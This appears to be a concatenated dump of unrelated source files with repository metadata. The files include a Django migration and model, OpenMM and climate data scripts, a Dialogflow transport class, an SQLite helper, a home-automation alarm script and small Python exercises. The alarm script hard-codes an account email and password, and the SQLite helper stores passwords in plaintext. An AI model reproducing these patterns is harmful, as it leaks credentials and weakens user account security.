#测试用例数据
testcase_list=[]
#当前执行的测试用例集名字,其实就是用例集的文件名
now_testsuite_name= None | [
"huaizheng.xie@shuyun.com"
] | huaizheng.xie@shuyun.com |
5acd1660ba5455bc1084047dc66d3485dde5efb6 | fb9c24e1e27c930881f54a0d609683983c726cec | /main/migrations/0032_auto_20210326_1139.py | 9fac8da7459eaeeeeff9e17fe2d1e1408b18388e | [] | no_license | Safintim/flower-shop | 6ba28f3f82912bcedd8c7d1e259557cda729410e | 92c0b7488b5370fc5512d6ce85f0e76a2a55bdbd | refs/heads/master | 2023-04-08T18:48:43.866959 | 2021-04-14T10:18:06 | 2021-04-14T10:18:06 | 254,976,051 | 0 | 0 | null | 2020-06-06T08:55:36 | 2020-04-11T23:50:58 | Python | UTF-8 | Python | false | false | 371 | py | # Generated by Django 3.1.7 on 2021-03-26 11:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0031_auto_20210326_1118'),
]
operations = [
migrations.DeleteModel(
name='Callback',
),
migrations.DeleteModel(
name='Configuration',
),
]
| [
"timurtlt96@mail.ru"
] | timurtlt96@mail.ru |
d023b130f65e19950fb31e48e224df3d98fde7be | 97b5e5b1f634012ac1a0552e9ebf9f23881c9bb7 | /openmm_equilibration.py | 725168f98e652b9efc6b1e270e8bc449594dc628 | [
"MIT"
] | permissive | mikeoconnor0308/HTMD-Adaptive-OpenMM | ce5884b090b72369224df64b1849a98d6f28eeaa | 0a994b1a2c0f48a1c7653e0042716799430e5c98 | refs/heads/master | 2021-05-14T15:37:15.167517 | 2018-01-02T14:22:21 | 2018-01-02T14:22:21 | 115,997,346 | 2 | 2 | null | 2018-01-02T11:34:45 | 2018-01-02T09:19:49 | Python | UTF-8 | Python | false | false | 3,704 | py | """
Loads a pdb file (+ dcd file if required) minimizes and equilibrates using Amber10 forcefield & implicit solvent.
It also outputs an AceMD .coor file for compatibility with HTMD's adaptive sampling.
For follow up use in adaptive sampling in HTMD.
"""
#/usr/bin/env python3
from __future__ import print_function
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
import argparse
import time
import sys
import os
import mdtraj
import mdtraj.reporters
parser = argparse.ArgumentParser(description="Run an OpenMM Simulation")
parser.add_argument('topology', type=str, help='PDB file to run simulation from')
parser.add_argument('-c', '--coords', type=str, help='DCD file to load coordinates from')
parser.add_argument('-f', '--frame', type=int, help='DCD frame to load coordinates from', default=0)
parser.add_argument('-T', '--temperature', type=float, help='Temperature for simulation', default=300)
parser.add_argument('-teq', '--equilibration_time', type=float,
help='Time (in ns) to equilibrate system', default=2)
parser.add_argument('-ts', '--time_step', type=float, help='Time step (in fs)', default=1.0)
parser.add_argument('-fr', '--friction', type=float, help='Friction coefficent (1/ps)', default=1.0)
parser.add_argument('-o', '--output_path', type=str, help='Path to output trajectory files to. Defaults to path of input file', default="")
args = parser.parse_args()
temp = args.temperature
t_equil = args.equilibration_time
fric = args.friction
pdb_str = args.topology
# load pdb from file using MDTraj
if args.coords:
traj = mdtraj.load_dcd(args.coords, top=pdb_str)
else:
traj = mdtraj.load(pdb_str)
# add traj argument to set unit cell information.
topology = traj.topology.to_openmm(traj)
forcefield = app.ForceField('amber10.xml', 'amber10_obc.xml')
print("Creating model for pdb {} from frame {}".format(pdb_str, args.frame))
modeller = app.Modeller(topology, traj.openmm_positions(args.frame))
system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.CutoffPeriodic,
nonbondedCutoff=2.0 * unit.nanometers, constraints=app.HBonds)
timestep = args.time_step * unit.femtoseconds
integrator = mm.LangevinIntegrator(temp * unit.kelvin, fric / unit.picoseconds,
timestep)
integrator.setConstraintTolerance(0.00001)
platform = mm.Platform.getPlatformByName('CUDA')
simulation = app.Simulation(modeller.topology, system, integrator, platform)
simulation.context.setPositions(modeller.positions)
print("minimizing...")
simulation.minimizeEnergy()
if args.output_path != "":
output_path = args.output_path + "/"
else:
output_path = os.path.splitext(pdb_str)[0]
simulation.context.setVelocitiesToTemperature(temp * unit.kelvin)
# equilibrate
print("Equilibrating ...")
nsteps = int(t_equil * unit.nanoseconds / timestep)
simulation.reporters.append(app.StateDataReporter(sys.stdout, 1000, step=True, time=True, progress=True,
potentialEnergy=True, temperature=True, remainingTime=True,
speed=True, totalSteps=nsteps, separator=','))
# Run the equilibration for the requested number of steps.
simulation.step(nsteps)
# Pull the final coordinates and write them out as a PDB next to the inputs.
positions = simulation.context.getState(getPositions=True).getPositions()
pdb_out = '{}/input.pdb'.format(output_path)
# NOTE(review): the file handle passed to writeFile is never closed explicitly.
app.PDBFile.writeFile(simulation.topology, positions, open(pdb_out, 'w'))
# HTMD adaptive sampling doesn't work very well with pdb files, so for now we'll generate a .coor file to use.
# load the coor file into htmd, if it exists and store as a pdb file.
from htmd.ui import *
htmd_mol = Molecule(pdb_out)
# Re-save the final coordinates in AceMD .coor format for HTMD's adaptive sampling.
htmd_mol.write('{}/input.coor'.format(output_path))
"mikeoconnor0308@gmail.com"
] | mikeoconnor0308@gmail.com |
04ffc83362365411680d47c2fd4221c7a4424d62 | 3d325da9ac51d1b47cc06e3aec5fdad0aaccd248 | /alarm.py | a75dbbfe4e2327a526314b3dae0818156b260ca5 | [] | no_license | bkanuka/kodi_alarm | 4613d7a840d8c9ab23faed59a9f799796dd2f772 | 47842c4d8f10d04c2cbd280f322bc69c03a70937 | refs/heads/master | 2016-09-06T13:13:37.140130 | 2015-08-30T18:02:22 | 2015-08-30T18:02:22 | 39,732,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | import sys
import time
from harmony_control import Harmony
from kodi_control import Kodi
from amp_control import Amp

# Account and network configuration for the Harmony hub and Kodi box.
# SECURITY(review): credentials are hard-coded in source; move them to an
# environment variable or a config file outside version control.
EMAIL='bkanuka@gmail.com'
PASSWORD='lookout'
HARMONY_IP='HarmonyHub'
HARMONY_PORT=5222
KODI_IP='kodi.home.bkanuka.com'
KODI_PORT=8080

# Connect to the Harmony hub (activity control + amp volume) and Kodi.
print 'init'
harmony=Harmony(HARMONY_IP, HARMONY_PORT, EMAIL, PASSWORD)
amp = Amp(HARMONY_IP, HARMONY_PORT, EMAIL, PASSWORD)
kodi = Kodi(KODI_IP, KODI_PORT)

# Alarm sequence: switch to the Kodi activity, set the volume, start music.
print 'starting kodi'
harmony.start_kodi(wait=True)
print 'setting volume'
amp.set_vol(60)
print 'playing'
kodi.play(playlist='Nikta', shuffle=True)
| [
"bkanuka@gmail.com"
] | bkanuka@gmail.com |
6895432cdb44dcd345003bed6d3af69f1745cbce | 2c7f99ff86d1786d133df13a630d62e7dcc63fab | /google/cloud/dialogflow_v2/services/conversation_profiles/transports/base.py | 5768948c216410b18bbda0988ae8fa09340f5c83 | [
"Apache-2.0"
] | permissive | rlindao/python-dialogflow | 2141b7181506210c6cfffb27bb9599ad21261c28 | 8958e562bb159b00bb1fc0fa97e5ffd35dea058d | refs/heads/master | 2023-04-06T15:09:14.888871 | 2021-04-16T21:34:24 | 2021-04-16T21:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,312 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.dialogflow_v2.types import conversation_profile
from google.cloud.dialogflow_v2.types import (
conversation_profile as gcd_conversation_profile,
)
from google.protobuf import empty_pb2 as empty # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflow",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class ConversationProfilesTransport(abc.ABC):
"""Abstract transport class for ConversationProfiles."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
)
def __init__(
self,
*,
host: str = "dialogflow.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# Save the scopes.
self._scopes = scopes or self.AUTH_SCOPES
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=self._scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=self._scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_conversation_profiles: gapic_v1.method.wrap_method(
self.list_conversation_profiles,
default_timeout=None,
client_info=client_info,
),
self.get_conversation_profile: gapic_v1.method.wrap_method(
self.get_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.create_conversation_profile: gapic_v1.method.wrap_method(
self.create_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.update_conversation_profile: gapic_v1.method.wrap_method(
self.update_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.delete_conversation_profile: gapic_v1.method.wrap_method(
self.delete_conversation_profile,
default_timeout=None,
client_info=client_info,
),
}
@property
def list_conversation_profiles(
self,
) -> typing.Callable[
[conversation_profile.ListConversationProfilesRequest],
typing.Union[
conversation_profile.ListConversationProfilesResponse,
typing.Awaitable[conversation_profile.ListConversationProfilesResponse],
],
]:
raise NotImplementedError()
@property
def get_conversation_profile(
self,
) -> typing.Callable[
[conversation_profile.GetConversationProfileRequest],
typing.Union[
conversation_profile.ConversationProfile,
typing.Awaitable[conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def create_conversation_profile(
self,
) -> typing.Callable[
[gcd_conversation_profile.CreateConversationProfileRequest],
typing.Union[
gcd_conversation_profile.ConversationProfile,
typing.Awaitable[gcd_conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def update_conversation_profile(
self,
) -> typing.Callable[
[gcd_conversation_profile.UpdateConversationProfileRequest],
typing.Union[
gcd_conversation_profile.ConversationProfile,
typing.Awaitable[gcd_conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def delete_conversation_profile(
self,
) -> typing.Callable[
[conversation_profile.DeleteConversationProfileRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
__all__ = ("ConversationProfilesTransport",)
| [
"noreply@github.com"
] | rlindao.noreply@github.com |
01504108aee0443c04b0634dcab1846110c965b7 | 32d32081f03ec813faed9559300d633761cd275c | /dbhelper.py | b0e54dc865e9473f76938b9bba860cc0c8f703cb | [] | no_license | jjsalomon/internship-sample-code | 5bb7c7358c01bb387c0e5f300f6bb7c32d49d62d | 766f8e1f99cfb0f5ad0ebab360442da22e6d4a52 | refs/heads/master | 2021-01-19T19:39:55.452384 | 2017-08-23T16:01:38 | 2017-08-23T16:01:38 | 101,199,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,771 | py | # -*- coding: utf-8 -*-
import sqlite3
class DatabaseHelper():
    """Singleton helper that owns the SQLite database (database.db).

    Creates the schema on first use and provides every insert/select helper
    used by the recording app. Mutating methods take a ``case`` argument:
    when it equals "Testing" the transaction is rolled back instead of
    committed, so test runs leave no rows behind.
    """

    # Shared singleton instance.
    __instance = None

    @staticmethod
    def getInstance():
        """Return the single DatabaseHelper, creating it on first call."""
        if DatabaseHelper.__instance is None:
            DatabaseHelper()
        return DatabaseHelper.__instance

    def __init__(self):
        """Register the singleton and build the schema on first creation."""
        if DatabaseHelper.__instance is not None:
            print("Returning Database Helper Instance")
        else:
            DatabaseHelper.__instance = self
            print('[BOOTING]: Database Helper Module')
            self.create_tables()

    def connect_db(self):
        """Open and return a new connection to database.db."""
        try:
            conn = sqlite3.connect('database.db', timeout=10)
            print('[SUCCESS]: Connected to the Database')
            return conn
        except Exception as e:
            print("[FAIL]: Could not connect to the Database")
            raise e

    def create_tables(self):
        """Create all application tables if they do not exist yet."""
        # Connect outside the try so a failed connect does not leave `conn`
        # unbound in the finally clause (the original could raise NameError).
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            CREATE TABLE IF NOT EXISTS users(ID INTEGER PRIMARY KEY AUTOINCREMENT,
            username VARCHAR(20) NOT NULL UNIQUE,
            password VARCHAR(20) NOT NULL,
            sex VARCHAR(10) NOT NULL,
            age int,
            diagnosed int)
            ''')
            cursor.execute('''
            CREATE TABLE IF NOT EXISTS audio_recordings(ID INTEGER PRIMARY KEY AUTOINCREMENT,
            accuracypercentage float NOT NULL,
            pitch_variance float NOT NULL,
            wordspermin float NOT NULL,
            modal_frequency float NOT NULL,
            breath_time float NOT NULL,
            avg_amplitude float NOT NULL,
            filename text NOT NULL,
            userID int,
            FOREIGN KEY (userID) REFERENCES users(ID)
            )
            ''')
            # NOTE: recordID actually references users(ID); the column name
            # is historical and kept for compatibility.
            cursor.execute('''
            CREATE TABLE IF NOT EXISTS prescreening(ID INTEGER PRIMARY KEY AUTOINCREMENT,
            recordID int,
            mood VARCHAR(10) NOT NULL,
            medication VARCHAR(10) NOT NULL,
            food VARCHAR(10),
            FOREIGN KEY(recordID) REFERENCES users(ID)
            )
            ''')
            cursor.execute('''
            CREATE TABLE IF NOT EXISTS config(ID INTEGER PRIMARY KEY AUTOINCREMENT,
            recordID int,
            time INTEGER NOT NULL,
            ch_acc INTEGER NOT NULL,
            ch_wpm INTEGER,
            ch_freq INTEGER,
            ch_mod_freq INTEGER,
            ch_avg_amp INTEGER,
            ch_breath INTEGER,
            FOREIGN KEY(recordID) REFERENCES users(ID)
            )
            ''')
            # Fixed: the original was missing the comma after
            # "total_troughs int", which made this statement a SQL syntax
            # error and aborted schema creation entirely.
            cursor.execute('''
            CREATE TABLE IF NOT EXISTS video_recordings(ID INTEGER PRIMARY KEY AUTOINCREMENT,
            recordID int NOT NULL,
            total_blinks int NOT NULL,
            total_peaks int NOT NULL,
            total_troughs int,
            blinkspermin float NOT NULL,
            peakspermin float NOT NULL,
            troughspermin float NOT NULL,
            video_duration float NOT NULL,
            FOREIGN KEY(recordID) REFERENCES users(ID))
            ''')
            conn.commit()
            print("[SUCCESS]: Created the tables")
        except Exception as e:
            print("[FAIL]: Could not create tables")
            # Roll back BEFORE re-raising; the original rolled back after
            # `raise`, which never executed (dead code).
            conn.rollback()
            raise e
        finally:
            conn.close()

    def insert_users(self, username, password, sex, age, diagnosed, case):
        """Insert one user row; rolls back instead of committing for Testing."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            INSERT INTO users(username,password,sex,age,diagnosed) VALUES(?,?,?,?,?)
            ''', (username, password, sex, age, diagnosed))
            print('[SUCCESS]: Inserted a user')
            if case == "Testing":
                conn.rollback()
            else:
                conn.commit()
        except Exception as e:
            print("[FAIL]: Failed to insert the user into DB")
            conn.rollback()  # was unreachable after raise in the original
            raise e
        finally:
            conn.close()

    def insert_audiorecordings(self, userId, accuracypercent, filename, wpm, pitch_var, mfreq, breath_time, avgAmp, case):
        """Insert one audio-feature row linked to userId."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            INSERT INTO audio_recordings(accuracypercentage,filename,pitch_variance,wordspermin,modal_frequency, breath_time, avg_amplitude,userID)
            VALUES(?,?,?,?,?,?,?,?)''', (accuracypercent, filename, pitch_var, wpm, mfreq, breath_time, avgAmp, userId))
            if case == "Testing":
                conn.rollback()
            else:
                conn.commit()
        except Exception as e:
            print("[FAIL]: Failed to insert recordings into DB")
            conn.rollback()
            raise e
        finally:
            conn.close()

    def insert_videorecordings(self, userId, blinks, peaks, troughs, blinkspermin, peakspermin, troughspermin, duration, case):
        """Insert one video-feature row linked to userId."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            INSERT INTO video_recordings(recordID,total_blinks,total_peaks,total_troughs,blinkspermin,
            peakspermin,troughspermin,video_duration) VALUES(?,?,?,?,?,?,?,?)
            ''', (userId, blinks, peaks, troughs, blinkspermin, peakspermin, troughspermin, duration))
            if case == "Testing":
                conn.rollback()
            else:
                conn.commit()
        except Exception as e:
            print("[FAIL]: Failed to insert video recordings into DB")
            conn.rollback()
            raise e
        finally:
            conn.close()

    def insert_prescreening(self, mood, medication, food, userId, case):
        """Insert one prescreening questionnaire row for userId."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            INSERT INTO prescreening(recordID,mood,medication,food)
            VALUES(?,?,?,?)''', (userId, mood, medication, food))
            print('[SUCCESS]: Inserted prescreening')
            if case == "Testing":
                conn.rollback()
            else:
                conn.commit()
        except Exception as e:
            print('[FAIL]: Failed to insert a text sample into the DB')
            conn.rollback()
            raise e
        finally:
            conn.close()

    def insert_config(self, userId, time, ch_acc, ch_wpm, ch_freq, ch_mod_freq, ch_breath, ch_avg_amp, case):
        """Insert one per-user configuration row."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            cursor.execute('''
            INSERT INTO config(recordID,time,ch_acc,ch_wpm,ch_freq,ch_mod_freq,ch_breath,ch_avg_amp)
            VALUES(?,?,?,?,?,?,?,?)''', (userId, time, ch_acc, ch_wpm, ch_freq, ch_mod_freq, ch_breath, ch_avg_amp))
            print('[SUCCESS]: Inserted config')
            if case == "Testing":
                conn.rollback()
            else:
                conn.commit()
        except Exception as e:
            print('[FAIL]: Failed to insert a text sample into the DB')
            conn.rollback()
            raise e
        finally:
            conn.close()

    def return_data(self):
        """Debug helper: print every row of the users table."""
        conn = self.connect_db()  # fixed typo: was self.connect_deb()
        try:
            cursor = conn.cursor()
            selectcur = cursor.execute('''
            SELECT * FROM users''')
            for row in selectcur:
                print('{0} : {1}, {2}'.format(row[0], row[1], row[2]))
        finally:
            conn.close()

    def checkUserCredentials(self, function, username, password):
        """Validate credentials ('Login') or username availability ('Register').

        Returns the user's ID for a successful login, "Invalid" for a failed
        one; for Register returns "Valid" when the username is free, else
        "Invalid".
        """
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            if function == 'Login':
                selectcur = cursor.execute('''
                SELECT ID,username FROM users WHERE username = ? AND password = ?''',
                (username, password))
                row = selectcur.fetchone()
                if row is None:
                    return "Invalid"
                # row = (ID, username); confirm the username matches exactly
                if username == row[1]:
                    return row[0]
                return 'Invalid'
            elif function == 'Register':
                # Availability must ignore the password: usernames are UNIQUE,
                # so any existing row with this name makes it unavailable. The
                # original matched username AND password, reporting "Valid"
                # for a taken name with a different password, which then
                # crashed the INSERT on the UNIQUE constraint.
                cursor.execute('SELECT ID FROM users WHERE username = ?', (username,))
                if cursor.fetchone() is None:
                    return "Valid"
                return "Invalid"
        except Exception as e:
            print('[FAIL]: Failed to perform check function - DB error')
            conn.rollback()
            raise e
        finally:
            conn.close()

    def return_audiorecordings(self, userId):
        """Return per-column lists of all audio features stored for userId."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            selectcur = cursor.execute('''
            SELECT accuracypercentage, filename, pitch_variance,wordspermin,modal_frequency, breath_time, avg_amplitude FROM audio_recordings
            WHERE userID = ?
            ''', (userId,))
            rows = selectcur.fetchall()
            acc = [r[0] for r in rows]
            fn = [r[1] for r in rows]
            pitch_var = [r[2] for r in rows]
            wpm = [r[3] for r in rows]
            mFreq = [r[4] for r in rows]
            brTime = [r[5] for r in rows]
            avgAmp = [r[6] for r in rows]
            # NOTE: the historical return order swaps wpm and pitch_var
            # relative to the SELECT column order; kept for compatibility.
            return acc, fn, wpm, pitch_var, mFreq, brTime, avgAmp
        except Exception as e:
            print('[FAIL]: Failed to return audio recordings- DB error')
            conn.rollback()
            raise e
        finally:
            conn.close()

    def return_config(self, userID):
        """Return per-column lists of all config rows stored for userID."""
        conn = self.connect_db()
        try:
            cursor = conn.cursor()
            selectcur = cursor.execute('''
            SELECT ch_acc, ch_wpm, ch_freq, ch_mod_freq,ch_breath,ch_avg_amp FROM config
            WHERE recordID = ?
            ''', (userID,))
            rows = selectcur.fetchall()
            # Local names are historical (they mirror return_audiorecordings)
            # and do not match the column names; the return ORDER follows the
            # SELECT column order and is preserved for callers.
            acc = [r[0] for r in rows]
            pitch_var = [r[1] for r in rows]
            wpm = [r[2] for r in rows]
            mFreq = [r[3] for r in rows]
            brTime = [r[4] for r in rows]
            avgAmp = [r[5] for r in rows]
            return acc, pitch_var, wpm, mFreq, brTime, avgAmp
        except Exception as e:
            print('[FAIL]: Failed to return config settings- DB error')
            conn.rollback()
            raise e
        finally:
            conn.close()
| [
"jsalomo1@ms.ds.uhc.com"
] | jsalomo1@ms.ds.uhc.com |
0b9347644b1ad62f3f1deb8668c660a135c70885 | e89509b453632747077bc57dbec265a7703d5c7c | /list/listappend.py | a2ddb719341f157c2047747bdda0aa142f51df03 | [] | no_license | Madhav2108/udemy-python-as | a9dcfdbfdc1bb85471aa66de77957e962a7c5486 | 0bc6a501516618fb3c7ab10be6bc16c047aeec3f | refs/heads/master | 2023-03-30T11:25:16.064592 | 2021-03-30T18:10:46 | 2021-03-30T18:10:46 | 286,001,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | List = []
# (Re)initialize the working list (the original `List = []` initializer sits
# on the corrupted header line above this block).
List = []
print(List)
List.append(1)
List.append(2)
List.append(4)
print(List)
# Append 1..3 one element at a time.
for i in range(1, 4):
    List.append(i)
print(List)
# append() adds the tuple as a single nested element.
List.append((5, 6))
print(List)
List2 = ['For', 'Geeks']
# The whole second list becomes one nested element.
List.append(List2)
print(List)
List.insert(3, 12)
List.insert(0, 'Geeks')
print(List)
# extend() splices each element in individually.
List.extend([8, 'Geeks', 'Always'])
print(List)
# remove() deletes the first occurrence of a value.
List.remove(8)
List.remove(12)
print(List)
# pop() with no argument removes the last element; pop(i) removes index i.
List.pop()
print(List)
List.pop(2)
print(List)
Sliced_List = List[::-1]
print("\nPrinting List in reverse: ")
print(Sliced_List)
# Fixed: the original called `list.sort()` on the BUILT-IN type (TypeError),
# and the list mixes ints/strings/containers, which cannot be ordered in
# Python 3 -- sort by each element's string representation instead.
List.sort(key=str)
print(List)
| [
"noreply@github.com"
] | Madhav2108.noreply@github.com |
4b0ce440690b330210af5adef191674bf778c002 | 352d34bd1288b3484f134edddec261ff106c67be | /data_handling_scripts/climex_time_series_length.py | 11a0edbecaf3d37d37520fdcda6378f9cadab2e0 | [
"MIT"
] | permissive | thanosargiriou/climex | 01b44bbdec2261642129393114522272d6d157fe | 73971c56f9afb054ed088843995e9e48e694d8ea | refs/heads/master | 2023-07-01T04:58:09.770410 | 2021-08-03T18:04:12 | 2021-08-03T18:04:12 | 304,844,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | """
Reads the daily_data_allstations_20210319.csv file and finds the time - series length for each station and parameter
Thanos Argiriou, 2021-07-11, LAPUP
"""
import pandas as pd
params = ['TN', 'TG', 'TX', 'DTR', 'RR']  # Meteorological parameters to be processed
# params = ['TN']
# Reads the datafile
df = pd.read_csv("daily_data_allstations_20210319.csv", na_values='NA', parse_dates=True, index_col=1)
stations = df['Station'].unique()  # Extracts the station codes
# stations = [16606]
records = []  # one dict per (station, parameter) pair
for wmo_code in stations:
    df_station = df.loc[df['Station'] == wmo_code]  # Extracts the data of a single station
    for parameter in params:
        df_2bchecked = df_station[parameter].dropna()
        print(f"Station: {wmo_code}, Parameter: {parameter}, Start date: {df_2bchecked.index.min()}, "
              f"End date: {df_2bchecked.index.max()}")
        records.append({'Station': wmo_code, 'Parameter': parameter,
                        'Start': df_2bchecked.index.min(), 'End': df_2bchecked.index.max()})
# Fixed: DataFrame.append() was removed in pandas 2.0; build the frame once
# from the accumulated records instead of appending row by row (which was
# also quadratic in the number of rows).
df_output = pd.DataFrame(records, columns=['Station', 'Parameter', 'Start', 'End'])
df_output.sort_values(by=['Parameter', 'Start']).to_csv('time_series_length.csv', index=False)
| [
"athanarg@gmail.com"
] | athanarg@gmail.com |
1ac4822dd02e34f946f4183122d8a6b5ec804d02 | ba949e02c0f4a7ea0395a80bdc31ed3e5f5fcd54 | /problems/greedy/Solution678.py | f37f62721d5aa37063dd666a0d011a7ac22e9daa | [
"MIT"
] | permissive | akaliutau/cs-problems-python | 6bc0a74064f6e9687fe58b13763da1fdf2e1f626 | 9b1bd8e3932be62135a38a77f955ded9a766b654 | refs/heads/master | 2023-05-11T22:19:06.711001 | 2021-06-04T11:14:42 | 2021-06-04T11:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,937 | py | """ Given a string containing only three types of characters: '(', ')' and '*',
write a function to check whether this string is valid. We define
the validity of a string by these rules:
Any left parenthesis '(' must have a corresponding right parenthesis ')'. Any
right parenthesis ')' must have a corresponding left parenthesis '('. Left
parenthesis '(' must go before the corresponding right parenthesis ')'. '*'
could be treated as a single right parenthesis ')' or a single left
parenthesis '(' or an empty string. An empty string is also valid.
Example 1: Input: "()" Output: True
( * ) )
l 1 0 -1 -2
t 1 2 1 0
When checking whether the string is valid, we only cared about the "balance":
the number of extra, open left brackets as we parsed through the string. For
example, when checking whether '(()())' is valid, we had a balance of 1, 2,
1, 2, 1, 0 as we parse through the string: '(' has 1 left bracket, '((' has
2, '(()' has 1, and so on. This means that after parsing the first i symbols,
(which may include asterisks,) we only need to keep track of what the balance
could be.
For example, if we have string '(***)', then as we parse each symbol, the set
of possible values for the balance is
[1] for '(';
[0, 1, 2] for '(*';
[0, 1, 2, 3] for '(**';
[0, 1, 2, 3, 4] for '(***', and
[0, 1, 2, 3] for '(***)'.
Furthermore, we can prove these states always form a contiguous interval.
Thus, we only need to know the left and right bounds of this interval. That
is, we would keep those intermediate states described above as [lo, hi] = [1,
1], [0, 2], [0, 3], [0, 4], [0, 3].
Algorithm
Let lo, hi respectively be the smallest and largest possible number of open
left brackets after processing the current character in the string.
"""
class Solution678:
    """Placeholder for LeetCode 678 (Valid Parenthesis String).

    The intended algorithm is described in the module docstring above:
    track [lo, hi], the smallest/largest possible count of unmatched '('
    while scanning, treating '*' as '(', ')' or empty.
    """
    pass
| [
"aliaksei.kaliutau@gmail.com"
] | aliaksei.kaliutau@gmail.com |
3971c8ab3be504b2d034eba31fa56669b8617dd8 | 97146f81bb9f80371ef261998eb5ba51230ad636 | /portfolio/models.py | 65cd11c88ac65a4482f0b50bad31e54cf3cb65a1 | [] | no_license | camiloGmz/my-first-blog | 69cfd985b73d8e72d9ace94d650fc1e66efb9f74 | e297b00ea13eb463285fa78adf65e8230e29a60d | refs/heads/master | 2020-05-31T04:18:44.897823 | 2019-06-20T02:30:41 | 2019-06-20T02:30:41 | 190,096,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | from django.db import models
# Create your models here.
class Project(models.Model):
    """A portfolio project entry (title, description, image, timestamps)."""
    title = models.CharField(max_length=200, verbose_name='Titulo')
    description = models.TextField(verbose_name='Descripción')
    # Uploaded images are stored under MEDIA_ROOT/projects.
    image = models.ImageField(verbose_name='Imagen', upload_to="projects")
    # Timestamps are maintained automatically by Django on insert/update.
    created = models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')
    update = models.DateTimeField(auto_now=True, verbose_name='Fecha de edición')
    class Meta:
        # Admin display names (Spanish) and newest-first default ordering.
        verbose_name='Proyecto'
        verbose_name_plural='Proyectos'
        ordering=["-created"]
    def __str__(self):
        # Human-readable representation used throughout the admin.
        return self.title
| [
"camilo07@utp.edu.co"
] | camilo07@utp.edu.co |
b18f2725fed0c7d7320443034e222fa535f61df9 | a889ab9b402424b0cfdf5f14da62bd4e747270a2 | /GithubApi.py | 3d94ba6e5a0cf715d48c9d2e73ee35d9e701cbb0 | [] | no_license | prerana-agale/Github_Integration | cea00a0334ad02ee8fbbc635bc54dce512f819e0 | 89b380938817c58c6d2c64bf73f4cd73907d4cce | refs/heads/master | 2023-01-10T01:54:16.287728 | 2020-11-11T06:16:23 | 2020-11-11T06:16:23 | 308,229,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | import requests
from pprint import pprint
from secret import Token_Value
API_URL = "https://api.github.com"
GITHUB_TOKEN = Token_Value

# Auth + projects-preview headers sent with every request.
headers = {
    "Authorization": "token " + GITHUB_TOKEN,
    "Accept": "application/vnd.github.inertia-preview+json"
}

